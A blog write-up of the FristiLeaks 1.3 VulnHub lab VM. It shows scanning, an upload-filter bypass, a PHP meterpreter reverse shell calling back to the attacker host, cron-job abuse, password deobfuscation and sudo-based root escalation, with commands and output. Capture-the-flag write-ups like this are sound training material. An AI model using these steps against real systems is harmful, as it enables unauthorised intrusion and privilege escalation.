FristiLeaks 1.3 VulnHub Writeup

Description:

A small VM made for a Dutch informal hacker meetup called Fristileaks. Meant to be broken in a few hours without requiring debuggers, reverse engineering, etc.

NOTE: to set it up, the VM's MAC address must be changed to 08:00:27:A5:A6:76.
This is what the VM looks like once booted (screenshot).
The goal is to become root and capture the flag.

Information gathering

First, locate the target machine:

nmap -sn 192.168.224.0/24

root@kali:~# nmap -sn 192.168.224.0/24
Starting Nmap 7.40 ( https://nmap.org ) 
Nmap scan report for 192.168.224.1
Host is up (0.00024s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.224.2
Host is up (0.00016s latency).
MAC Address: 00:50:56:FD:70:F2 (VMware)
Nmap scan report for 192.168.224.135
Host is up (0.00016s latency).
MAC Address: 08:00:27:A5:A6:76 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.224.254
Host is up (0.00015s latency).
MAC Address: 00:50:56:FB:7A:70 (VMware)
Nmap scan report for 192.168.224.136
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 1.71 seconds

The target host is at 192.168.224.135; now scan it in detail.

nmap -sS -sV -T4 -A -O 192.168.224.135

Starting Nmap 7.40 ( https://nmap.org )
Nmap scan report for 192.168.224.135
Host is up (0.0016s latency).
Not shown: 999 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.2.15 ((CentOS) DAV/2 PHP/5.3.3)
| http-methods:
|_ Potentially risky methods: TRACE
| http-robots.txt: 3 disallowed entries
|_/cola /sisi /beer
|_http-server-header: Apache/2.2.15 (CentOS) DAV/2 PHP/5.3.3
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
MAC Address: 08:00:27:A5:A6:76 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.10, Linux 2.6.32 - 3.13
Network Distance: 1 hop

What we learn: port 80 is open, served by Apache httpd 2.2.15 ((CentOS) DAV/2 PHP/5.3.3), and there is a robots.txt.

Finding a way in

First, browse the web site.


Check robots.txt and visit the three directories it lists; each of them only returns the same image.


That does not seem useful by itself, but all three names are drinks, and the home page says "keep calm and drink fristi", so try /fristi.


We get a login page! :) Look at the page source.


There is a comment left by eezeepz, followed by an image embedded as base64. Further down is a commented-out blob that also looks like base64; decoding it yields an image of what appears to be a password.


Logging in with eezeepz as the username succeeds.

Now we can upload files.


There is only a simple filter: only png, jpg and gif are allowed, and it is bypassed by changing the file extension.
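As an added illustration (not code from the VM or the writeup) of why a suffix-only filter is so weak, here is that check in Python next to a hardened version that requires a single allowlisted extension and matching file-signature bytes; the sample bodies are constructed.

```python
import os
import re

# Allowlist: permitted extension -> file signatures (magic bytes) it must carry.
ALLOWED_TYPES = {
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".jpg": (b"\xff\xd8\xff",),
    ".gif": (b"GIF87a", b"GIF89a"),
}

# Constructed sample bodies (not files from the VM).
PNG_BODY = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16
PHP_BODY = b"<?php /* constructed non-image body */ ?>"


def weak_allows(filename: str) -> bool:
    """Suffix-only check like the one the writeup bypasses: anything that
    merely ends in an image extension passes, including shell.php.jpg."""
    return filename.lower().endswith(tuple(ALLOWED_TYPES))


def hardened_allows(filename: str, content: bytes) -> bool:
    """Accept only a single allowlisted extension on a plain stem, and only
    when the body starts with the signature of the claimed image type.
    (Also store the file under a server-generated name; the client's
    filename should never decide what the web server executes.)"""
    stem, ext = os.path.splitext(os.path.basename(filename).lower())
    if not re.fullmatch(r"[a-z0-9_-]+", stem):  # rejects a second '.' as in x.php.jpg
        return False
    signatures = ALLOWED_TYPES.get(ext)
    if signatures is None:
        return False
    return any(content.startswith(sig) for sig in signatures)
```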

Exploitation

Append a .jpg suffix, upload a reverse shell, and set up the listener.

msf exploit(handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.224.136
lhost => 192.168.224.136
msf exploit(handler) > set lport 445
lport => 445
msf exploit(handler) > run
[*] Started reverse TCP handler on 192.168.224.136:445
[*] Starting the payload handler...
[*] Sending stage (33986 bytes) to 192.168.224.135
[*] Meterpreter session 1 opened (192.168.224.136:445 -> 192.168.224.135:57657) at 2018-02-14 17:34:28 +0800

meterpreter > shell
Process 5305 created.
Channel 0 created.
id
uid=48(apache) gid=48(apache) groups=48(apache)
pwd
/var/www/html/fristi/uploads

There are a lot of files; working through the tree directory by directory, /var/www contains a notes.txt.

cat notes.txt
hey eezeepz your homedir is a mess, go clean it up, just dont delete
the important stuff.
-jerry

So look at eezeepz's home directory, where another notes.txt turns up.

cat notes.txt
Yo EZ,
I made it possible for you to do some automated checks,
but I did only allow you access to /usr/bin/* system binaries. I did
however copy a few extra often needed commands to my
homedir: chmod, df, cat, echo, ps, grep, egrep so you can use those
from /home/admin/
Don't forget to specify the full path for each binary!
Just put a file called "runthis" in /tmp/, each line one command. The
output goes to the file "cronresult" in /tmp/. It should
run every minute with my account privileges.
- Jerry

The hint: the commands chmod, df, cat, echo, ps, grep and egrep are available; put a file called runthis in /tmp/, and a cronresult file will appear, with each line executed under Jerry's (admin's) privileges.

To read admin's home directory, use chmod through this cron job to change its permissions.

echo "/home/admin/chmod 777 /home/admin" > /tmp/runthis
ls
cronresult
runthis
cat cronresult
executing: /home/admin/chmod 777 /home/admin
executing: /home/admin/chmod 777 /home/admin
executing: /home/admin/chmod 777 /home/admin
executing: /home/admin/chmod 777 /home/admin

Now we can enter admin's directory.

cd admin
ls
cat
chmod
cronjob.py
cryptedpass.txt
cryptpass.py
df
echo
egrep
grep
ps
whoisyourgodnow.txt

cryptedpass.txt

mVGZ3O3omkJLmy2pcuTq

cryptpass.py

#Enhanced with thanks to Dinesh Singh Sikawar @LinkedIn
import base64,codecs,sys

def encodeString(str):
    # Step 1: base64-encode the input (Python 2: str is a byte string)
    base64string= base64.b64encode(str)
    # Step 2: reverse the base64 text; step 3: apply rot13 to the result
    return codecs.encode(base64string[::-1], 'rot13')

cryptoResult=encodeString(sys.argv[1])
print cryptoResult

whoisyourgodnow.txt

=RFn0AKnlMHMPIzpyuTI0ITG

So the passwords have been obfuscated rather than encrypted: first base64, then the string is reversed, then rot13 is applied. Every step is trivially reversible.

Decoding the two files gives, respectively:

thisisalsopw123
LetThereBeFristi!
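The decoder for this scheme, written here as an added example in Python 3 (it is not part of the VM or the writeup); it undoes the three steps of cryptpass.py in reverse order and also ports the encoder so the round trip can be checked against the two values found on the box.

```python
import base64
import codecs


def encode_string(plaintext: str) -> str:
    """Same transform as the VM's cryptpass.py, ported to Python 3:
    base64 -> reverse the text -> rot13."""
    b64 = base64.b64encode(plaintext.encode()).decode()
    return codecs.encode(b64[::-1], "rot13")


def decode_string(encoded: str) -> str:
    """Undo the steps in reverse order: rot13 is its own inverse, so is
    reversing the string, and the remainder is plain base64."""
    b64 = codecs.decode(encoded, "rot13")[::-1]
    return base64.b64decode(b64).decode()


# The two values recovered from /home/admin (quoted from the writeup above).
CRYPTEDPASS = "mVGZ3O3omkJLmy2pcuTq"
WHOISYOURGODNOW = "=RFn0AKnlMHMPIzpyuTI0ITG"

if __name__ == "__main__":
    for value in (CRYPTEDPASS, WHOISYOURGODNOW):
        print(value, "->", decode_string(value))
```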

The second one is probably the password of another user, fristigod.

Switching with su - ran into a problem here: it complains that standard in must be a tty.
Some searching shows this can be solved by having Python spawn a pseudo-terminal: python -c 'import pty;pty.spawn("/bin/sh")'
The reason is that su (and sudo) is not a simple filter process: for security reasons, Linux requires the password to be typed at a terminal device (tty) rather than read from standard input (stdin). In other words, when you enter the password, sudo is effectively reading the keyboard, not characters piped through bash. So to be able to enter a password at all, we have to emulate a terminal device.

python -c 'import pty;pty.spawn("/bin/sh")'
sh-4.1$ su - fristigod
su - fristigod
Password: LetThereBeFristi!

We are now in as fristigod.

-bash-4.1$ pwd
pwd
/var/fristigod
-bash-4.1$ id
id
uid=502(fristigod) gid=502(fristigod) groups=502(fristigod)
-bash-4.1$ ls
ls

Still not root, though, and the directory looks empty; try ls -al.

-bash-4.1$ ls -al
ls -al
total 16
drwxr-x--- 3 fristigod fristigod 4096 Nov 25 2015 .
drwxr-xr-x. 19 root root 4096 Nov 19 2015 ..
-rw------- 1 fristigod fristigod 864 Nov 25 2015 .bash_history
drwxrwxr-x. 2 fristigod fristigod 4096 Nov 25 2015 .secret_admin_stuff
-bash-4.1$ cd .se
cd .-bash-4.1$ ls -al
ls -al
total 16
drwxrwxr-x. 2 fristigod fristigod 4096 Nov 25 2015 .
drwxr-x--- 3 fristigod fristigod 4096 Nov 25 2015 ..
-rwsr-sr-x 1 root root 7529 Nov 25 2015 doCom

We have no permission to run doCom as this user, so check the command history.

-bash-4.1$ cat .bash_history
cat .bash_history
ls
pwd
ls -lah
cd .secret_admin_stuff/
ls
./doCom
./doCom test
sudo ls
exit
cd .secret_admin_stuff/
ls
./doCom
sudo -u fristi ./doCom ls /
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom ls /
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom ls /
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
sudo /var/fristigod/.secret_admin_stuff/doCom
exit
sudo /var/fristigod/.secret_admin_stuff/doCom
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
groups
ls -lah
usermod -G fristigod fristi
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
less /var/log/secure e
Fexit
exit
exit

fristigod evidently uses sudo a lot, so try sudo as well.

-bash-4.1$ sudo -l
sudo -l
[sudo] password for fristigod: LetThereBeFristi!
Matching Defaults entries for fristigod on this host:
requiretty, !visiblepw, always_set_home, env_reset, env_keep="COLORS
DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR LS_COLORS", env_keep+="MAIL PS1
PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE
LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY
LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL
LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin
User fristigod may run the following commands on this host:
(fristi : ALL) /var/fristigod/.secret_admin_stuff/doCom

Following the hint, try:

-bash-4.1$ sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
Usage: ./program_name terminal_command ...-bash-4.1$

Spawn a shell:

bash-4.1$ sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom /bin/bash
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom /bin/bash
bash-4.1# id
id
uid=0(root) gid=100(users) groups=100(users),502(fristigod)
bash-4.1# cd /root
cd /root
bash-4.1# ls
ls
fristileaks_secrets.txt
bash-4.1# cat fri
cat fristileaks_secrets.txt
Congratulations on beating FristiLeaks 1.0 by Ar0xA [https://tldr.nu]
I wonder if you beat it in the maximum 4 hours it's supposed to take!
Shoutout to people of #fristileaks (twitter) and #vulnhub (FreeNode)
Flag: Y0u_kn0w_y0u_l0ve_fr1st1

We have the flag; done.

Summary

On tty, pty and pts in Linux

1> tty (the general term for terminal devices):
The word tty comes from Teletypes, or teletypewriters. It originally referred to the teleprinter, a device with a printer and keyboard that read and sent messages over a serial line. That hardware was later replaced by a keyboard and screen, so "terminal" is the more fitting name today.
A terminal is a character device; there are many types, and tty is commonly used as shorthand for all of them.
2> pty (pseudo-terminal):
But when we telnet to a remote host or use xterm, we still need a terminal to interact with, don't we? Yes, and that is what the pseudo-terminal, pty (pseudo-tty), provides.
3> pts/ptmx (used together to implement a pty):
pts (pseudo-terminal slave) is the implementation mechanism of the pty; it works together with ptmx (pseudo-terminal master) to realise the pty.

References

http://blog.sina.com.cn/s/blog_638ac15c01012e0v.html

https://g0blin.co.uk/fristileaks-1-3-vulnhub-writeup/#-cola-sisi-and-beer

Source

The end :)

Author: Venture
Link: http://yoursite.com/2018/02/19/Fristileaks 1.3/
Copyright notice: Unless otherwise stated, all posts on this blog are licensed under CC BY-NC-SA 4.0. Please credit Venture's Blog when reposting.